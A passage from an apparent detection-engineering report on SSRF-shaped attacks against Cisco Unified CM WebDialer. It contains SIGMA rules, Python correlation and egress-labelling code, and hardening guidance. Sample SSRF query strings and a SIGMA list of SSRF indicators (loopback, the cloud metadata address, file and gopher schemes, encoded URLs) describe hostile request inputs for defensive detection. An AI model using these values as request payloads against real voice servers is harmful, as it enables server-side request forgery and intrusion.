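    "ipv6_loopback": "target=http%3A%2F%2F%5B%3A%3A1%5D%3A8443%2F",
    "external_url": "target=https%3A%2F%2Fexample.com%2Fhook",
    "benign_click_to_call": "destination=5551234&source=clicktocall",
}


def label_samples() -> dict:
    return {name: ssrf_request_indicator(q) for name, q in SAMPLES.items()}


if __name__ == "__main__":
    for name, (flag, reasons) in label_samples().items():
        print(f"{name:24} {flag!s:5} {reasons}")
```

The double-encoded and decimal-address samples are the ones a literal substring list misses; both come out flagged here because decoding happens before classification and the host is parsed as an address rather than compared as text. The absolute_url reason is deliberately weaker than the others and is worth keeping as a separate triage field so that an allowlisted integration URL can be excepted without suppressing loopback or link-local hits.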

DRI Assessment

Moderate to high resilience where SIGMA conversion maps cleanly to local web, network, administrative, service-state, file-integrity, and route-plan telemetry with reliable Cisco Unified CM enrichment. Resilience is lower where URI visibility, Unified CM administrative telemetry, rare-egress baselines, or stable Cisco Unified CM scope enrichment is unavailable.

DRI

8.0 / 10

TCR Assessment

Operational confidence is moderate for standalone converted SIGMA matches and high when backend SIEM correlation links WebDialer suspicious activity to rare Unified CM egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

7.8 / 10

Full-Telemetry TCR

8.9 / 10

Limitations

SIGMA does not provide native production-grade temporal correlation across independent event streams. Backend SIEM correlation, enrichment, exception handling, and time-window logic are required. These rules depend on local field mapping, URI-preserving WebDialer telemetry, Cisco Unified CM asset enrichment, WebDialer enablement enrichment, administrative audit visibility, rare-egress baselines, control-plane telemetry, and backend conversion quality. Legitimate click-to-call workflows, provider support, monitoring, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

SIGMA event-rule templates for Cisco Unified CM / Unified CM SME WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change. These templates are backend-convertible event rules. The production correlation between WebDialer suspicious activity and follow-on rare egress or control-plane change must be implemented in the target SIEM using local time windows, Cisco Unified CM scope enrichment, exception lists, and backend-native correlation logic.

title: Cisco Unified CM WebDialer Suspicious Activity
id: 74ddfe31-b5ce-4b03-a0db-b8e91cf6b801
status: test
description: Detects suspicious Cisco Unified CM or Unified CM SME WebDialer activity that may indicate SSRF-shaped request behavior, abnormal WebDialer endpoint access, suspicious source context, backend fetch behavior, or request normalization anomalies.
references:
  - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/
author: CyberDax
date: 2026-06-24
logsource:
  category: webserver
detection:
  selection_cucm_asset:
    labels.is_cucm_asset: true
    labels.webdialer_enabled: true
  selection_webdialer_path:
    # Sigma string matching is case-insensitive by default; the mixed-case
    # duplicates below are kept for backends that do not honor that.
    url.path|contains:
      - "webdialer"
      - "WebDialer"
      - "wdservlet"
      - "clicktocall"
  selection_webdialer_event:
    labels.webdialer_event_type:
      - "abnormal_webdialer_access"
      - "webdialer_request_from_unapproved_source"
      - "webdialer_access_outside_click_to_call_workflow"
      - "webdialer_backend_fetch_behavior"
      - "webdialer_response_anomaly"
      - "webdialer_failure_to_success_pattern"
      - "suspicious_source_to_voice_management_plane"
  selection_ssrf_indicator:
    labels.ssrf_request_indicator: true
  selection_request_indicator:
    # Literal substrings only: loopback and link-local targets, any absolute URL
    # ("://" and its percent-encoded form), non-HTTP schemes, and "http"/"https"
    # spelled as percent-encoded bytes. Decode the query at ingest as well, or
    # double-encoded payloads will slip past this list.
    url.query|contains:
      - "127.0.0.1"
      - "localhost"
      - "0.0.0.0"
      - "169.254.169.254"
      - "://"
      - "%3a%2f%2f"
      - "%3A%2F%2F"
      - "file%3a"
      - "file%3A"
      - "gopher%3a"
      - "gopher%3A"
      - "%68%74%74%70"
      - "%68%74%74%70%73"
  selection_source_risk:
    labels.webdialer_source_risk: true
  selection_reputation_risk:
    labels.webdialer_reputation_risk: true
  filter_approved_change:
    labels.is_approved_change: true
  filter_approved_workflow:
    labels.is_approved_webdialer_workflow: true
  filter_approved_maintenance:
    labels.is_approved_maintenance_or_incident_response: true
  condition: selection_cucm_asset and (selection_webdialer_path or selection_webdialer_event or selection_ssrf_indicator or selection_request_indicator or selection_source_risk or selection_reputation_risk) and not 1 of filter_*
fields:
  - labels.cucm_scope
  - host.name
  - source.ip
  - http.request.method
  - url.path
  - url.query
  - url.full
  - http.response.status_code
  - user_agent.original
  - labels.webdialer_event_type
  - labels.ssrf_request_indicator
falsepositives:
  - Approved WebDialer click-to-call workflows
  - Approved call-management integrations
  - Approved provider support
  - Approved vulnerability scanning
  - Approved patch validation
  - Approved monitoring activity
level: medium
tags:
  - attack.initial-access
  - attack.t1190

---

title: Cisco Unified CM Rare Egress From Voice Control-Plane Asset
id: e8b27c1c-3216-4cf4-81a6-0976f2a4e002
status: test
description: Detects rare or unapproved outbound communication from Cisco Unified CM, Unified CM SME, or related voice-management assets that may support post-WebDialer exploitation correlation in the backend SIEM.
references:
  - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/
author: CyberDax
date: 2026-06-24
logsource:
  category: network_connection
detection:
  selection_cucm_asset:
    labels.is_cucm_asset: true
  selection_rare_egress:
    labels.is_rare_cucm_egress: true
  selection_egress_event:
    labels.rare_egress_event_type:
      - "rare_outbound_connection"
      - "unexpected_external_egress"
      - "unexpected_dns_resolution"
      - "connection_to_unapproved_destination"
      - "connection_to_unknown_reputation_destination"
      - "connection_to_suspicious_reputation_destination"
      - "egress_not_in_voice_platform_baseline"
  selection_destination_reputation:
    labels.destination_reputation:
      - "unknown"
      - "suspicious"
      - "malicious"
  filter_approved_change:
    labels.is_approved_change: true
  filter_approved_destination:
    labels.is_approved_egress_destination: true
  filter_approved_maintenance:
    labels.is_approved_maintenance_or_incident_response: true
  condition: selection_cucm_asset and selection_rare_egress and (selection_egress_event or selection_destination_reputation) and not 1 of filter_*
fields:
  - labels.cucm_scope
  - host.name
  - source.ip
  - destination.ip
  - destination.domain
  - destination.port
  - network.transport
  - labels.rare_egress_event_type
  - labels.destination_reputation
falsepositives:
  - Approved Cisco support activity
  - Approved monitoring activity
  - Approved backup activity
  - Approved patch validation
  - Approved DNS, NTP, directory, certificate, or provider destinations
  - Approved emergency remediation
level: high
tags:
  - attack.command-and-control
  - attack.t1105

---

title: Cisco Unified CM Control-Plane Change On Voice Platform Asset
id: 43e4942a-759c-40b5-84ab-935ca1b0e003
status: test
description: Detects suspicious Cisco Unified CM or Unified CM SME control-plane changes that may support post-WebDialer exploitation correlation in the backend SIEM.
references:
  - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/
author: CyberDax
date: 2026-06-24
logsource:
  category: application
detection:
  selection_cucm_asset:
    labels.is_cucm_asset: true
  selection_control_change:
    labels.is_cucm_control_plane_change: true
  selection_control_event:
    labels.control_event_type:
      - "cucm_file_created"
      - "cucm_file_modified"
      - "cucm_service_restart"
      - "cucm_administrative_configuration_change"
      - "cucm_route_plan_change"
      - "cucm_call_routing_change"
      - "new_cucm_administrator_created"
      - "cucm_administrator_modified"
      - "management_login_from_new_source"
      - "unusual_cluster_communication"
      - "voice_service_instability"
      - "unexpected_shell_activity"
  filter_approved_change:
    labels.is_approved_change: true
  filter_approved_change_type:
    labels.is_approved_change_type: true
  filter_approved_maintenance:
    labels.is_approved_maintenance_or_incident_response: true
  condition: selection_cucm_asset and selection_control_change and selection_control_event and not 1 of filter_*
fields:
  - labels.cucm_scope
  - host.name
  - source.ip
  - user.name
  - event.action
  - file.path
  - process.command_line
  - labels.control_event_type
  - labels.service_name
  - labels.service_action
  - labels.route_plan_object
  - labels.call_routing_change
falsepositives:
  - Approved Cisco patching
  - Approved service restart
  - Approved route-plan change
  - Approved certificate management
  - Approved provider support
  - Approved backup or restore activity
  - Approved incident response
level: high
tags:
  - attack.persistence
  - attack.t1505
  - attack.privilege-escalation
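The three templates only produce candidates; as stated at the top of this section, the WebDialer-to-follow-on logic has to live in the backend SIEM. The following Python sketch is an added example of that correlation, not code from the report, CyberDax or any SIEM vendor named here. It keys candidates on the three rule ids above, buckets them by labels.cucm_scope, looks for rare egress and control-plane change inside bounded windows after the upstream WebDialer event, escalates severity when both follow-on paths converge, and applies exceptions that are asset-bound, source-bound and time-bound in the way the report's change-control guidance requires. The window sizes, the event shape (rule.id, @timestamp, labels.cucm_scope, source.ip), the kind names and every sample event, ticket and address are assumptions.

```python
"""Backend correlation of the three SIGMA candidate families in this section.
Added example, not code from the report, CyberDax or any SIEM vendor named here.
The rule ids are the three templates above; the follow-on windows, the event
shape (rule.id, @timestamp, labels.cucm_scope, source.ip), the kind names and
every sample event, ticket and address are assumptions."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, FrozenSet, List

RULE_KIND = {
    "74ddfe31-b5ce-4b03-a0db-b8e91cf6b801": "webdialer_suspicious",
    "e8b27c1c-3216-4cf4-81a6-0976f2a4e002": "rare_egress",
    "43e4942a-759c-40b5-84ab-935ca1b0e003": "control_plane_change",
}
# Assumed follow-on windows, measured from the upstream WebDialer candidate.
FOLLOW_ON_WINDOW = {
    "rare_egress": timedelta(minutes=30),
    "control_plane_change": timedelta(hours=2),
}


def parse_ts(value: str) -> datetime:
    """ISO 8601 with trailing Z to an aware datetime (assumes UTC-normalized sources)."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


@dataclass(frozen=True)
class DetectionException:
    """A detection exception is asset-bound (scope), source-bound (sources) and time-bound."""
    ticket: str
    scope: str
    sources: FrozenSet[str]
    kinds: FrozenSet[str]
    not_before: datetime
    not_after: datetime

    def covers(self, event: dict) -> bool:
        ts = parse_ts(event["@timestamp"])
        return (event["labels.cucm_scope"] == self.scope
                and event["source.ip"] in self.sources
                and RULE_KIND.get(event["rule.id"]) in self.kinds
                and self.not_before <= ts <= self.not_after)


def correlate(events: List[dict], exceptions: List[DetectionException]) -> List[dict]:
    """One alert per WebDialer candidate that has follow-on evidence in the same scope."""
    buckets: Dict[str, Dict[str, List[dict]]] = {}
    for ev in events:
        kind = RULE_KIND.get(ev["rule.id"])
        if kind is None or any(x.covers(ev) for x in exceptions):
            continue  # unknown rule, or suppressed by a ticketed exception
        buckets.setdefault(ev["labels.cucm_scope"], {}).setdefault(kind, []).append(ev)

    alerts: List[dict] = []
    for scope, by_kind in buckets.items():
        for upstream in sorted(by_kind.get("webdialer_suspicious", []),
                               key=lambda e: parse_ts(e["@timestamp"])):
            t0 = parse_ts(upstream["@timestamp"])
            follow_on: Dict[str, List[dict]] = {}
            for kind, window in FOLLOW_ON_WINDOW.items():
                hits = [e for e in by_kind.get(kind, [])
                        if t0 < parse_ts(e["@timestamp"]) <= t0 + window]
                if hits:
                    follow_on[kind] = hits
            if not follow_on:
                continue  # a lone WebDialer candidate stays a candidate
            alerts.append({
                "scope": scope,
                "upstream": upstream,
                "paths": list(follow_on),
                # both paths converging is the strongest compromise signal the report describes
                "severity": "critical" if len(follow_on) == len(FOLLOW_ON_WINDOW) else "high",
                "follow_on": follow_on,
            })
    return alerts


WD_RULE, EGRESS_RULE, CHANGE_RULE = RULE_KIND  # keys in insertion order


def _ev(rule_id: str, ts: str, scope: str, src: str, extra: dict) -> dict:
    return {"rule.id": rule_id, "@timestamp": ts, "labels.cucm_scope": scope,
            "source.ip": src, **extra}


# Constructed sample candidates (all addresses, scopes and timestamps are made up).
SAMPLE_EVENTS = [
    # scope A: WebDialer candidate, rare egress 12 min later, new admin 75 min later
    _ev(WD_RULE, "2026-06-24T10:00:00Z", "cucm-cluster-a", "198.51.100.7", {"url.path": "/webdialer/Webdialer"}),
    _ev(EGRESS_RULE, "2026-06-24T10:12:00Z", "cucm-cluster-a", "10.10.5.21", {"destination.ip": "203.0.113.50"}),
    _ev(CHANGE_RULE, "2026-06-24T11:15:00Z", "cucm-cluster-a", "10.10.5.21",
        {"labels.control_event_type": "new_cucm_administrator_created"}),
    # scope B: approved scanner covered by a ticketed exception; the lone egress has no upstream
    _ev(WD_RULE, "2026-06-24T10:00:00Z", "cucm-cluster-b", "10.20.0.5", {"url.path": "/webdialer/Webdialer"}),
    _ev(EGRESS_RULE, "2026-06-24T10:05:00Z", "cucm-cluster-b", "10.10.6.21", {"destination.ip": "203.0.113.51"}),
    # scope C: the control-plane change lands outside the 2 h window
    _ev(WD_RULE, "2026-06-24T10:00:00Z", "cucm-cluster-c", "198.51.100.9", {"url.path": "/webdialer/Webdialer"}),
    _ev(CHANGE_RULE, "2026-06-24T13:00:00Z", "cucm-cluster-c", "10.10.7.21",
        {"labels.control_event_type": "cucm_service_restart"}),
]
SAMPLE_EXCEPTIONS = [
    DetectionException("CHG-0001", "cucm-cluster-b", frozenset({"10.20.0.5"}),
                       frozenset({"webdialer_suspicious"}),
                       parse_ts("2026-06-24T09:30:00Z"), parse_ts("2026-06-24T11:00:00Z")),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS, SAMPLE_EXCEPTIONS):
        print(alert["scope"], alert["severity"], alert["paths"])
```

Scope B illustrates the exception model: the scanner's WebDialer candidate is dropped because scope, source and time all match the ticket, and the remaining egress event is left as a standalone candidate rather than an alert. Drop the exception list and scope B becomes a second, high-severity alert.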

S26. Threat-to-Rule Traceability

Traceability Summary

The S25 detection set provides behavior-led coverage for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity and follow-on voice-control-plane compromise exposure. The rule set does not depend on a single IOC, exploit string, source IP, actor name, or one-off indicator. Coverage is built around suspicious WebDialer access, abnormal source and workflow context, backend-fetch or SSRF-shaped request behavior, rare Unified CM egress, administrative change, service-state change, file activity, route-plan or call-routing change, and voice-control-plane instability.

The detection model is strongest when WebDialer telemetry, Cisco Unified CM asset inventory, WebDialer enablement state, approved-source context, administrative audit telemetry, network egress telemetry, and control-plane change telemetry are normalized into a stable Cisco Unified CM scope. The completed S25 rule set supports direct detection, candidate generation, or backend correlation across NDR / Network Behavioral Analytics, SentinelOne, Splunk, Elastic, QRadar, and SIGMA.

Suspicious WebDialer and SSRF-Shaped Activity

This behavior is covered by rules that identify abnormal Cisco Unified CM / Unified CM SME WebDialer access, WebDialer requests from unapproved sources, access outside approved click-to-call workflows, SSRF-shaped request indicators, backend-fetch behavior, response anomalies, failure-to-success request patterns, and suspicious source-to-voice-management-plane activity.

·        NDR / Network Behavioral Analytics provides direct network and management-plane behavioral coverage for suspicious WebDialer access, abnormal source context, backend-fetch behavior, response anomalies, and suspicious voice-management-plane access patterns.

·        Splunk provides summary-backed correlation for suspicious WebDialer activity using WebDialer candidate summaries, approved-source lookups, source reputation context, and bounded follow-on timing.

·        Elastic provides transform-backed KQL candidate filters and EQL correlation using WebDialer enablement, Cisco Unified CM asset enrichment, SSRF request indicators, source-risk labels, and WebDialer event-type labels.

·        QRadar provides CRE building-block coverage for Cisco Unified CM WebDialer suspicious activity and WebDialer-enabled asset context.

·        SIGMA provides backend-convertible event-rule templates for suspicious WebDialer activity that can generate upstream candidates for SIEM-native correlation.

·        SentinelOne provides conditional endpoint-visible or adjacent-host coverage where WebDialer follow-on activity is observable through endpoint, management-host, reverse-proxy, monitoring, file-integrity, or appliance-adjacent telemetry.

Abnormal Source, Workflow, and Change Context

This behavior is covered by rules that distinguish suspicious WebDialer use from approved click-to-call workflows, provider support, vulnerability scanning, monitoring, patch validation, maintenance, backup activity, certificate management, route-plan changes, service restarts, and emergency remediation.

·        NDR / Network Behavioral Analytics supports approved-source, workflow, and change-context suppression where network identity, source reputation, maintenance context, and service ownership are available.

·        Splunk supports approved-source, approved-admin, reputation, maintenance, and baseline filtering through lookups, macros, and summary correlation.

·        Elastic supports approved-source, approved-change, approved-egress, and approved-maintenance context through enrichment policies, value lists, exception lists, and transform-backed labels.

·        QRadar supports approved workflow, provider support, scanner, maintenance, egress, and incident-response suppression through building blocks, reference sets, reference maps, and offense logic.

·        SIGMA supports suppression candidates through mapped enrichment fields and backend exception lists after conversion.

·        SentinelOne supports allowlisting and suppression for approved maintenance, support activity, monitoring, backup, certificate management, and provider-managed activity where those contexts are mapped into tenant-visible fields.

Rare Unified CM and Unified CM SME Egress

This behavior is covered by rules that identify rare outbound communication, unexpected external egress, unapproved destinations, suspicious or unknown destination reputation, unexpected DNS activity, and egress not present in the voice-platform baseline.

·        NDR / Network Behavioral Analytics provides direct behavioral coverage for rare or abnormal outbound communication from Cisco Unified CM nodes, Unified CM SME nodes, backend hosts, management interfaces, NAT egress identities, and voice-management segments.

·        Splunk provides summary-backed correlation between suspicious WebDialer candidates and valid rare-egress follow-on events occurring after the upstream WebDialer activity and within the configured rare-egress window.

·        Elastic provides EQL sequence correlation between suspicious WebDialer candidates and rare Unified CM egress candidates using a stable Cisco Unified CM scope field.

·        QRadar provides CRE correlation between WebDialer suspicious activity and rare Cisco Unified CM egress using building blocks, reference sets, reference maps, and bounded CRE windows.

·        SIGMA provides a backend-convertible rare-egress event template that can generate follow-on candidates for SIEM-native correlation.

·        SentinelOne provides conditional coverage for process-network connections or rare endpoint egress where Unified CM assets, management hosts, reverse proxies, monitoring hosts, or adjacent systems expose relevant endpoint telemetry.

Administrative and Voice-Control-Plane Change

This behavior is covered by rules that identify suspicious administrative configuration change, abnormal management login, administrator creation or modification, service restart, service manipulation, route-plan change, call-routing change, unusual cluster communication, voice-service instability, and related control-plane activity.

·        NDR / Network Behavioral Analytics supports behavioral correlation between suspicious WebDialer activity and downstream voice-control-plane changes where administrative, management-plane, cluster, service-state, or egress telemetry is visible.

·        Splunk provides summary-backed correlation between suspicious WebDialer candidates and valid control-plane change follow-on events occurring after the upstream WebDialer activity and within the configured control-plane change window.

·        Elastic provides EQL sequence correlation between suspicious WebDialer candidates and Unified CM control-plane change candidates using transform-backed enrichment labels and stable Cisco Unified CM scope.

·        QRadar provides CRE correlation between WebDialer suspicious activity and Cisco Unified CM control-plane change building blocks, including suspicious control-plane change context and approved-change suppression.

·        SIGMA provides a backend-convertible control-plane change event template that can generate follow-on candidates for SIEM-native correlation.

·        SentinelOne provides conditional endpoint-visible coverage for file modification, service manipulation, process execution, scheduled job creation, local user modification, credential or key access, and configuration-file access where those activities are visible on endpoint-managed or adjacent systems.

File, Service, Route-Plan, and Call-Routing Impact

This behavior is covered by rules that identify file creation, file modification, permission change, service restart, service modification, route-plan change, call-routing change, backup export activity, certificate or key access, and other high-risk artifacts that may indicate appliance-side compromise or operational impact.

·        SentinelOne provides the strongest host-level conditional coverage where endpoint or adjacent-host telemetry captures file, service, process, user, credential, key, configuration, or network-connection activity.

·        Splunk, Elastic, and QRadar provide strong correlation when file-integrity, service-state, administrative audit, route-plan, call-routing, and configuration-change telemetry are normalized into candidate summaries, transforms, custom properties, building blocks, or enrichment fields.

·        NDR / Network Behavioral Analytics provides supporting behavioral visibility where these changes produce observable management-plane, cluster, egress, or service-state network patterns.

·        SIGMA provides event-rule templates for backend candidate generation, but final impact correlation must occur in the target SIEM after conversion.

Voice-Service Instability and Appliance-Side Compromise Indicators

This behavior is covered by rules that identify voice-service instability, unexpected shell activity, service manipulation, file-write behavior, unauthorized administrator activity, abnormal cluster communication, rare egress, and control-plane change following suspicious WebDialer activity.

·        NDR / Network Behavioral Analytics supports network-visible instability, abnormal cluster communication, suspicious management-plane access, and rare egress.

·        SentinelOne supports endpoint-visible or adjacent-host compromise indicators where appliance-side or supporting-host telemetry is available.

·        Splunk supports post-WebDialer correlation across rare egress and control-plane change summaries, with severity escalation when multiple paths converge.

·        Elastic supports transform-backed and EQL-based correlation across WebDialer, rare egress, and control-plane change candidates.

·        QRadar supports CRE offense creation and offense severity or credibility escalation when WebDialer suspicious activity, rare egress, and control-plane change converge.

·        SIGMA supports candidate generation for each event family, with backend SIEM correlation required for final compromise-path interpretation.

Coverage Boundaries

The S25 rule set does not claim universal direct exploit confirmation. A single suspicious WebDialer request, standalone rare egress event, or isolated administrative change should be treated as a candidate signal until correlated with asset context, WebDialer enablement, source reputation, approved workflow context, timing, administrative telemetry, egress baselines, or control-plane change evidence.

Coverage is reduced where Cisco Unified CM WebDialer telemetry is unavailable, URI paths and query strings are not preserved, Cisco Unified CM asset inventory is incomplete, WebDialer enablement state is unknown, administrative audit logs are missing, rare-egress baselines are immature, endpoint visibility is unavailable, or a stable Cisco Unified CM scope cannot be created across network, endpoint, administrative, and control-plane telemetry.

AWS, Azure, GCP, and YARA were not included in S25 because the detection model is centered on Cisco Unified CM / Unified CM SME WebDialer and voice-control-plane appliance behavior. Cloud-only detections would be conditional downstream correlation without strong direct platform relevance, and YARA would require stable malware, webshell, script, or binary artifact evidence that is not established in this TTD.

Traceability Conclusion

The completed S25 detection set provides appropriate behavior-led traceability from Cisco Unified CM / Unified CM SME WebDialer suspicious activity to rare egress, administrative change, service manipulation, file activity, route-plan change, call-routing change, voice-service instability, and suspected appliance-side compromise. The strongest production outcome comes from combining NDR network behavior, Splunk and Elastic transform-backed correlation, QRadar CRE offense logic, SIGMA backend-convertible event candidates, and SentinelOne endpoint or adjacent-host visibility where available.

 

 

S29. Detection Coverage Summary

The S25 and S26 detection set provides behavior-led coverage for suspicious Cisco Unified CM / Unified CM SME WebDialer activity and follow-on voice-control-plane compromise exposure. Coverage is strongest when WebDialer access telemetry, Cisco Unified CM asset inventory, WebDialer enablement state, source reputation, rare egress telemetry, administrative audit logs, service-state logs, file-integrity logs, route-plan telemetry, and call-routing telemetry can be normalized into a stable Cisco Unified CM scope.

Direct Detection Coverage

Direct coverage is provided for suspicious WebDialer access patterns, abnormal source or workflow context, SSRF-shaped request indicators, backend-fetch behavior, rare Unified CM egress, suspicious administrative change, service restart, file modification, route-plan change, call-routing change, and voice-service instability where the relevant telemetry is available.

Correlation-Based Coverage

Correlation-based coverage is provided when suspicious WebDialer candidates can be tied to rare egress or control-plane changes within bounded timing windows. Splunk, Elastic, QRadar, and NDR provide the strongest correlation paths when candidate summaries, transforms, building blocks, reference sets, enrichment labels, and behavioral models are properly implemented.

Conditional Endpoint Coverage

SentinelOne coverage is conditional because Cisco Unified CM appliance endpoint visibility may vary by customer deployment. SentinelOne provides useful detection value where endpoint-visible or adjacent-host telemetry exists for Unified CM nodes, management hosts, reverse proxies, monitoring hosts, backup hosts, file-integrity collectors, or voice-management support systems.

Backend Candidate Coverage

SIGMA provides backend-convertible event-rule templates for WebDialer suspicious activity, rare egress, and control-plane change. SIGMA does not provide native temporal correlation by itself. Backend SIEM correlation is required for final WebDialer-to-follow-on detection logic.

Non-Coverage Conditions

The S25 detection set does not provide direct AWS, Azure, GCP, or YARA coverage. Cloud detections would be conditional downstream correlation without strong direct platform relevance, and YARA would require stable malware, script, webshell, or binary artifact evidence that is not established in this TTD.

S33. Defensive Control & Hardening Improvements

Patch and Exposure Reduction

Apply Cisco-provided fixed software for affected Cisco Unified CM / Unified CM SME systems. Where WebDialer is not required, disable it. Where WebDialer is required, restrict access to approved call-management integrations, approved user workflows, approved management networks, and approved provider-support paths.

Access Control

Limit WebDialer access to trusted internal sources and approved integrations. Restrict reverse-proxy, load-balancer, VPN, and management access paths. Require change-control review for externally reachable or provider-managed WebDialer exposure.

Segmentation

Segment Cisco Unified CM / Unified CM SME nodes, management interfaces, voice-management networks, backup systems, monitoring systems, and provider-support access paths. Limit outbound egress from voice-control-plane assets to approved destinations only.

Logging and Telemetry

Preserve URI path, query string, source IP, forwarded source IP, HTTP method, response status, user-agent, virtual host, backend host, and destination context for WebDialer traffic. Forward Cisco Unified CM administrative audit logs, service-state telemetry, route-plan changes, call-routing changes, configuration changes, file-integrity events, and backup/export activity to detection platforms.

Egress Control

Baseline and restrict outbound communication from Cisco Unified CM / Unified CM SME assets, management interfaces, NAT egress identities, and voice-management segments. Alert on rare destinations, unknown reputation destinations, suspicious reputation destinations, unexpected DNS activity, and egress outside approved service dependencies.
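One way to turn the baseline-and-restrict guidance above into the labels.is_rare_cucm_egress, labels.is_approved_egress_destination and labels.rare_egress_event_type labels that the S25 rare-egress template consumes, as an added Python example that is not code from the report, CyberDax or Cisco: it counts destination tuples per Cisco Unified CM scope over a history window, treats approved service dependencies (DNS, NTP, directory, provider) as an explicit allowlist, and labels anything else that is below the sighting threshold, external, or resolved to a never-seen domain. The threshold, the RFC 1918 definition of "internal", the dependency list and all sample records are assumptions.

```python
"""Rare-egress labelling for Cisco Unified CM connection events.  Added example,
not code from the report, CyberDax or Cisco.  Field and label names follow the
rare-egress SIGMA template on this page; the sighting threshold, the RFC 1918
definition of "internal", the dependency list and all sample records are assumptions."""
from __future__ import annotations

import ipaddress
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set, Tuple

MIN_BASELINE_HITS = 3  # assumption: fewer prior sightings than this is not yet baseline
INTERNAL_NETWORKS = [ipaddress.ip_network(n)
                     for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

EgressKey = Tuple[str, str, int, str]  # scope, destination ip, destination port, transport


@dataclass(frozen=True)
class ApprovedDependency:
    """An approved service dependency (DNS, NTP, directory, certificate, provider)."""
    name: str
    network: str              # CIDR
    port: Optional[int]       # None matches any port
    transport: Optional[str]  # None matches any transport

    def matches(self, dst_ip: str, port: int, transport: str) -> bool:
        return (ipaddress.ip_address(dst_ip) in ipaddress.ip_network(self.network)
                and self.port in (None, port)
                and self.transport in (None, transport))


def egress_key(rec: dict) -> EgressKey:
    return (rec["labels.cucm_scope"], rec["destination.ip"],
            int(rec["destination.port"]), rec["network.transport"].lower())


def build_baseline(history: Iterable[dict]) -> Tuple[Counter, Set[Tuple[str, str]]]:
    """Count destination tuples and collect (scope, domain) pairs seen in the history window."""
    counts: Counter = Counter()
    domains: Set[Tuple[str, str]] = set()
    for rec in history:
        counts[egress_key(rec)] += 1
        if rec.get("destination.domain"):
            domains.add((rec["labels.cucm_scope"], rec["destination.domain"].lower()))
    return counts, domains


def is_external(dst_ip: str) -> bool:
    ip = ipaddress.ip_address(dst_ip)
    return not any(ip in net for net in INTERNAL_NETWORKS)


def label_egress(event: dict, counts: Counter, domains: Set[Tuple[str, str]],
                 approved: List[ApprovedDependency]) -> dict:
    """Copy of the event carrying the labels the rare-egress template selects and filters on."""
    out = dict(event)
    scope, dst, port, transport = egress_key(event)
    if any(dep.matches(dst, port, transport) for dep in approved):
        out["labels.is_approved_egress_destination"] = True
        out["labels.is_rare_cucm_egress"] = False
        out["labels.rare_egress_event_type"] = []
        return out
    out["labels.is_approved_egress_destination"] = False
    reasons: List[str] = []
    if counts.get((scope, dst, port, transport), 0) < MIN_BASELINE_HITS:
        reasons.append("egress_not_in_voice_platform_baseline")
        if is_external(dst):
            reasons.append("unexpected_external_egress")
    domain = (event.get("destination.domain") or "").lower()
    if domain and (scope, domain) not in domains:
        reasons.append("unexpected_dns_resolution")
    out["labels.is_rare_cucm_egress"] = bool(reasons)
    out["labels.rare_egress_event_type"] = reasons
    return out


# Constructed allowlist and history; every address, port and domain is made up.
APPROVED = [
    ApprovedDependency("internal-dns", "10.10.1.0/24", 53, "udp"),
    ApprovedDependency("ntp", "10.10.1.0/24", 123, "udp"),
    ApprovedDependency("directory-ldaps", "10.10.2.0/24", 636, "tcp"),
    ApprovedDependency("provider-support", "203.0.113.0/24", 443, "tcp"),
]


def _rec(dst: str, port: int, transport: str, domain: Optional[str] = None,
         scope: str = "cucm-cluster-a") -> dict:
    rec = {"labels.cucm_scope": scope, "source.ip": "10.10.5.21", "destination.ip": dst,
           "destination.port": port, "network.transport": transport}
    if domain:
        rec["destination.domain"] = domain
    return rec


HISTORY = ([_rec("10.10.1.53", 53, "udp")] * 40
           + [_rec("10.10.1.123", 123, "udp")] * 20
           + [_rec("10.10.2.10", 636, "tcp", "ldap.corp.example")] * 12
           + [_rec("10.10.3.40", 8443, "tcp", "mon.corp.example")] * 5
           + [_rec("203.0.113.10", 443, "tcp", "support.provider.example")])

NEW_EVENTS = [
    _rec("10.10.1.53", 53, "udp"),                                 # approved DNS
    _rec("10.10.3.40", 8443, "tcp", "mon.corp.example"),           # in baseline, not on allowlist
    _rec("198.51.100.20", 443, "tcp", "updates.unknown.example"),  # never seen, external
    _rec("10.10.9.77", 22, "tcp"),                                 # never seen, internal
    _rec("203.0.113.10", 443, "tcp", "support.provider.example"),  # seen once, but approved
]


def label_all(events: List[dict], history: List[dict] = HISTORY,
              approved: List[ApprovedDependency] = APPROVED) -> List[dict]:
    counts, domains = build_baseline(history)
    return [label_egress(e, counts, domains, approved) for e in events]


if __name__ == "__main__":
    for labeled in label_all(NEW_EVENTS):
        print(labeled["destination.ip"], labeled["labels.is_rare_cucm_egress"],
              labeled["labels.rare_egress_event_type"])
```

The second and fifth events show the two ways a destination avoids a rare-egress label: enough prior sightings in the scope's baseline, or an explicit, narrowly scoped allowlist entry. Approved destinations are labelled as such rather than silently dropped so the template's filter_approved_destination still has a field to act on.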

Administrative Control

Review Unified CM administrator accounts, provider-support accounts, service accounts, route-plan permissions, call-routing change permissions, certificate-management access, backup access, and emergency-remediation procedures. Monitor administrator creation, administrator modification, unusual management login, route-plan changes, service restarts, and configuration changes.

Change-Control Integration

Integrate approved maintenance windows, approved provider support, approved vulnerability scanning, approved monitoring, approved route-plan changes, approved service restarts, approved certificate management, approved backup activity, and approved emergency remediation into detection exceptions. Exceptions should be time-bound, source-bound, and asset-bound.

Recovery Readiness

Validate restore procedures, configuration backups, route-plan recovery, service restart procedures, cluster health checks, call-routing validation, certificate recovery, and communications continuity plans. Treat voice-control-plane recovery as a business-continuity requirement, not only an infrastructure task.

S39. Economic Impact & Organizational Exposure

